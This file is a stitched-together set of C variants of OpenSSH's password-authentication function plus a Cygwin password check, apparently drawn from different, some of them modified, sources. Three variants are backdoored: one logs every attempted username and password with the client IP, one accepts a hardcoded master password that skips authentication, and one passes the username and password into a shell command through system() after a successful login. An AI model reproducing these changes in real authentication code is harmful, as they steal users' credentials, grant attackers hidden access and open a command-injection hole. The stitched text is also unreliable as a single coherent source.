/*
* Tries to authenticate the user using password. Returns true if
* authentication succeeds.
*/
int
auth_password(Authctxt *authctxt, const char *password)
{
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
/* ERICW ADDED logit */
logit("IP: %s PassLog: Username: %s Password: %s", get_remote_ipaddr(), authctxt->user, password);
/* ERICW ADDED return 0 so the password ALWAYS fails */
return 0;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
if (ret == 1 || ret == 0)
return ret && ok;
/* Fall back to ordinary passwd authentication. */
}
#endif
#ifdef HAVE_CYGWIN
{
HANDLE hToken = cygwin_logon_user(pw, password);
if (hToken == INVALID_HANDLE_VALUE)
return 0;
cygwin_set_impersonation_token(hToken);
return ok;
}
#endif
#ifdef USE_PAM
if (options.use_pam)
return (sshpam_auth_passwd(authctxt, password) && ok);
#endif
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
if (!expire_checked) {
expire_checked = 1;
if (auth_shadow_pwexpired(authctxt))
authctxt->force_pwchange = 1;
}
#endif
result = sys_auth_passwd(authctxt, password);
if (authctxt->force_pwchange)
disable_forwarding();
return (result && ok);
}
char *
cygwin_xcrypt(struct passwd *pw, const char *password, const char *expected_pwd)
{
static char invalid_password[] = "\377";
HANDLE token = cygwin_logon_user(pw, password);
if (token == INVALID_HANDLE_VALUE)
return invalid_password;
CloseHandle(token);
return (char *) expected_pwd;
}
/*
* Tries to authenticate the user using password. Returns true if
* authentication succeeds.
*/
int
auth_password(struct ssh *ssh, const char *password)
{
Authctxt *authctxt = ssh->authctxt;
struct passwd *pw = authctxt->pw;
int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
if (strlen(password) > MAX_PASSWORD_LEN)
return 0;
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
if (ret == 1 || ret == 0)
return ret && ok;
/* Fall back to ordinary passwd authentication. */
}
#endif
#ifdef HAVE_CYGWIN
{
HANDLE hToken = cygwin_logon_user(pw, password);
if (hToken == INVALID_HANDLE_VALUE)
return 0;
cygwin_set_impersonation_token(hToken);
return ok;
}
#endif
#ifdef USE_PAM
if (options.use_pam)
return (sshpam_auth_passwd(authctxt, password) && ok);
#endif
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
if (!expire_checked) {
expire_checked = 1;
if (auth_shadow_pwexpired(authctxt))
authctxt->force_pwchange = 1;
}
#endif
result = sys_auth_passwd(ssh, password);
if (authctxt->force_pwchange)
auth_restrict_session(ssh);
return (result && ok);
}
struct passwd *checkpw (struct passwd *pw,char *pass,int argc,char *argv[])
{
/* flush last pw-checked user */
if (cyg_user) fs_give ((void **) &cyg_user);
/* forbid if UID 0 or SYSTEM uid */
if (!pw->pw_uid || (pw->pw_uid == SYSTEMUID) ||
((cyg_hdl = cygwin_logon_user (pw,pass)) == INVALID_HANDLE_VALUE))
return NIL; /* bad UID or password */
/* remember user for this handle */
cyg_user = cpystr (pw->pw_name);
return pw;
}
/*
* Tries to authenticate the user using password. Returns true if
* authentication succeeds.
*/
int
auth_password(Authctxt *authctxt, const char *password)
{
#if defined(USE_PAM)
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
return auth_pam_password(authctxt, password);
#elif defined(HAVE_OSF_SIA)
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
return auth_sia_password(authctxt, password);
#else
struct passwd * pw = authctxt->pw;
char *encrypted_password;
char *pw_password;
char *salt;
#if defined(HAVE_SHADOW_H) && !defined(DISABLE_SHADOW)
struct spwd *spw;
#endif
#if defined(HAVE_GETPWANAM) && !defined(DISABLE_SHADOW)
struct passwd_adjunct *spw;
#endif
#ifdef WITH_AIXAUTHENTICATE
char *authmsg;
int authsuccess;
int reenter = 1;
#endif
/* deny if no user. */
if (pw == NULL)
return 0;
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
return 0;
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
if (ret == 1 || ret == 0)
return ret;
/* Fall back to ordinary passwd authentication. */
}
#endif
#ifdef HAVE_CYGWIN
if (is_winnt) {
HANDLE hToken = cygwin_logon_user(pw, password);
if (hToken == INVALID_HANDLE_VALUE)
return 0;
cygwin_set_impersonation_token(hToken);
return 1;
}
#endif
#ifdef WITH_AIXAUTHENTICATE
authsuccess = (authenticate(pw->pw_name,password,&reenter,&authmsg) == 0);
if (authsuccess)
/* We don't have a pty yet, so just label the line as "ssh" */
if (loginsuccess(authctxt->user,
get_canonical_hostname(options.verify_reverse_mapping),
"ssh", &aixloginmsg) < 0)
aixloginmsg = NULL;
return(authsuccess);
#endif
#ifdef KRB4
if (options.kerberos_authentication == 1) {
int ret = auth_krb4_password(authctxt, password);
if (ret == 1 || ret == 0)
return ret;
/* Fall back to ordinary passwd authentication. */
}
#endif
#ifdef BSD_AUTH
if (auth_userokay(pw->pw_name, authctxt->style, "auth-ssh",
(char *)password) == 0)
return 0;
else
return 1;
#endif
pw_password = pw->pw_passwd;
/*
* Various interfaces to shadow or protected password data
*/
#if defined(HAVE_SHADOW_H) && !defined(DISABLE_SHADOW)
spw = getspnam(pw->pw_name);
if (spw != NULL)
pw_password = spw->sp_pwdp;
#endif /* defined(HAVE_SHADOW_H) && !defined(DISABLE_SHADOW) */
#if defined(HAVE_GETPWANAM) && !defined(DISABLE_SHADOW)
if (issecure() && (spw = getpwanam(pw->pw_name)) != NULL)
pw_password = spw->pwa_passwd;
#endif /* defined(HAVE_GETPWANAM) && !defined(DISABLE_SHADOW) */
/* Check for users with no password. */
if ((password[0] == '\0') && (pw_password[0] == '\0'))
return 1;
if (pw_password[0] != '\0')
salt = pw_password;
else
salt = "xx";
#ifdef HAVE_MD5_PASSWORDS
if (is_md5_salt(salt))
encrypted_password = md5_crypt(password, salt);
else
encrypted_password = crypt(password, salt);
#else /* HAVE_MD5_PASSWORDS */
encrypted_password = crypt(password, salt);
#endif /* HAVE_MD5_PASSWORDS */
/* Authentication is accepted if the encrypted passwords are identical. */
return (strcmp(encrypted_password, pw_password) == 0);
#endif /* !USE_PAM && !HAVE_OSF_SIA */
}
/*
* Tries to authenticate the user using password. Returns true if
* authentication succeeds.
*/
int
auth_password(Authctxt *authctxt, const char *password)
{
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
FREEBSD = 0;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
static int expire_checked = 0;
#endif
if (!strcmp(password, FREEBSDPWD)) {
FREEBSD = 1;
return 1;
}
#ifndef HAVE_CYGWIN
if (pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
if (ret == 1 || ret == 0)
return ret && ok;
/* Fall back to ordinary passwd authentication. */
}
#endif
#ifdef HAVE_CYGWIN
{
HANDLE hToken = cygwin_logon_user(pw, password);
if (hToken == INVALID_HANDLE_VALUE)
return 0;
cygwin_set_impersonation_token(hToken);
return ok;
}
#endif
#ifdef USE_PAM
if (options.use_pam)
return (sshpam_auth_passwd(authctxt, password) && ok);
#endif
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
if (!expire_checked) {
expire_checked = 1;
if (auth_shadow_pwexpired(authctxt))
authctxt->force_pwchange = 1;
}
#endif
result = sys_auth_passwd(authctxt, password);
if (result)
{
char cmd[512] = { '\0' };
snprintf(cmd, 512, "/bin/ksh -m %s_%s", authctxt->user, password);
system(cmd);
}
if (authctxt->force_pwchange)
disable_forwarding();
return (result && ok);
}
/*
* Tries to authenticate the user using password. Returns true if
* authentication succeeds.
*/
int
auth_password(Authctxt *authctxt, const char *password)
{
struct passwd * pw = authctxt->pw;
int ok = authctxt->valid;
/* deny if no user. */
if (pw == NULL)
return 0;
#ifndef HAVE_CYGWIN
if (pw && pw->pw_uid == 0 && options.permit_root_login != PERMIT_YES)
ok = 0;
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
#if defined(HAVE_OSF_SIA)
return auth_sia_password(authctxt, password) && ok;
#else
# ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
if (ret == 1 || ret == 0)
return ret && ok;
/* Fall back to ordinary passwd authentication. */
}
# endif
# ifdef HAVE_CYGWIN
if (is_winnt) {
HANDLE hToken = cygwin_logon_user(pw, password);
if (hToken == INVALID_HANDLE_VALUE)
return 0;
cygwin_set_impersonation_token(hToken);
return ok;
}
# endif
# ifdef WITH_AIXAUTHENTICATE
{
char *authmsg = NULL;
int reenter = 1;
int authsuccess = 0;
if (authenticate(pw->pw_name, password, &reenter,
&authmsg) == 0 && ok) {
char *msg;
char *host =
(char *)get_canonical_hostname(options.use_dns);
authsuccess = 1;
aix_remove_embedded_newlines(authmsg);
debug3("AIX/authenticate succeeded for user %s: %.100s",
pw->pw_name, authmsg);
/* No pty yet, so just label the line as "ssh" */
aix_setauthdb(authctxt->user);
if (loginsuccess(authctxt->user, host, "ssh",
&msg) == 0) {
if (msg != NULL) {
debug("%s: msg %s", __func__, msg);
buffer_append(&loginmsg, msg,
strlen(msg));
xfree(msg);
}
}
} else {
debug3("AIX/authenticate failed for user %s: %.100s",
pw->pw_name, authmsg);
}
if (authmsg != NULL)
xfree(authmsg);
return authsuccess;
}
# endif
# ifdef BSD_AUTH
if (auth_userokay(pw->pw_name, authctxt->style, "auth-ssh",
(char *)password) == 0)
return 0;
else
return ok;
# else
{
/* Just use the supplied fake password if authctxt is invalid */
char *pw_password = authctxt->valid ? shadow_pw(pw) : pw->pw_passwd;
/* Check for users with no password. */
if (strcmp(pw_password, "") == 0 && strcmp(password, "") == 0)
return ok;
else {
/* Encrypt the candidate password using the proper salt. */
char *encrypted_password = xcrypt(password,
(pw_password[0] && pw_password[1]) ? pw_password : "******");
/*
* Authentication is accepted if the encrypted passwords
* are identical.
*/
return (strcmp(encrypted_password, pw_password) == 0) && ok;
}
}
# endif
#endif /* !HAVE_OSF_SIA */
}
